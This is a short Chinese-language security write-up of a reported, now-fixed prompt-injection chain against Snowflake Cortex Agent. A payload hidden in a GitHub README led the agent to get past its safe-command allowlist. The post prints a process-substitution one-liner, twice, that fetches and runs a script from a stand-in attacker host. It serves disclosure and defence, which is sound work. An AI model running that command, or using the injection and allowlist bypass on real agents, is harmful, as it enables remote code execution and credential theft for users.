Snowflake Cortex AI 沙箱逃逸漏洞
#安全 #AI #漏洞 #沙箱发现概述
安全研究员发现 Snowflake Cortex Agent 存在严重的 prompt injection 攻击链,允许攻击者突破 AI 沙箱执行任意恶意代码。
核心漏洞:攻击者通过在 GitHub 仓库的 README 中隐藏 prompt injection payload,成功诱导 Cortex Agent 执行恶意命令。
攻击技术细节
攻击流程:
- 攻击者在恶意仓库的 README 底部隐藏 prompt injection 代码
- 用户让 Cortex Agent 审查该 GitHub 仓库
- Agent 读取 README 时触发 injection
- 利用
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))绕过安全检查 - 成功执行任意 shell 命令
技术分析
漏洞的关键在于过程替换(process substitution)的利用:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Snowflake 将 cat 命令列为安全可执行命令,未能防御这种形式的过程替换。
安全建议
- AI Agent 应以最高权限运行命令时假设它可以做任何事
- 使用确定性沙箱(deterministic sandbox)而非依赖层
- 对命令模式的白名单不可靠,应采用更严格的隔离
- 已向 Snowflake 报告,漏洞已被修复
影响范围
此漏洞影响所有使用 Snowflake Cortex Agent 的用户,攻击者可以:
- 窃取凭据和 secrets
- 访问内部系统
- 执行任意代码
- 横向移动到其他服务